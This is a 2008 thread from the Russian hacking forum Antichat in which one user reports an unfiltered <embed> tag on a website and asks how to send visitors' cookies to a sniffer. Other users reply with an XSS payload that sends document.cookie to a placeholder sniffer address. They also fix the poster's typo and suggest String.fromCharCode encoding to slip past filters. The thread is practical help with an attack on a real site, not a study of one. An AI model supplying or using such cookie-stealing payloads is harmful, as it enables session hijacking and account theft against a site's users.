Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   использование тега embed для угона cookies ? (https://forum.antichat.xyz/showthread.php?t=96287)

ickhz 14.12.2008 00:51

использование тега embed для угона cookies ?
 
Обнаружила, что на сайте на фильтруется тег <embed> и javascript в нем. ТО есть работает конструкция <embed src=javascript:alert('ok');this.avi>.. Подскажите, как прописать здесь скрипт, чтобы работала передача cookies на сниффер античата.

Pashkela 14.12.2008 00:53

также, как и обычно

Велемир 14.12.2008 01:06

Везде,где есть атрибут src,есть возможность эксплуатации XSS,не учитывая существования фильтров.

-m0rgan- 14.12.2008 01:07

В XSS не особо,но по моему так:
<embed src=javascript:src='адрес снифера';this.avi>

Велемир 14.12.2008 01:16

+document.cookie :D

-m0rgan- 14.12.2008 01:19

Бля,точно,пропустил:(
спс за поправку!

Велемир 14.12.2008 01:29

:):) Вообще,есть список *уязвимых* тегов касательно XSS.
http://www.inattack.ru/article/519.html к примеру,но был список и получше...

ickhz 15.12.2008 18:06

А, поняла, там фигня какая-то хитрая по-моему, которая не дает забрать cookies..

alert(document.cookies) выдает вместо cookies undefined

Типа защита такая что-ли))))

freddi 15.12.2008 19:31

ickhz, он это выдает тк нету такого объекта, как document.cookies, есть document.cookie.

iddqd 15.12.2008 19:34

попробуй прогнать скрипт через StringFromCharCode
http://pro.grammatic.org/post-javascript-eval-stringfromcharcode-encoder-11.aspx


Время: 19:30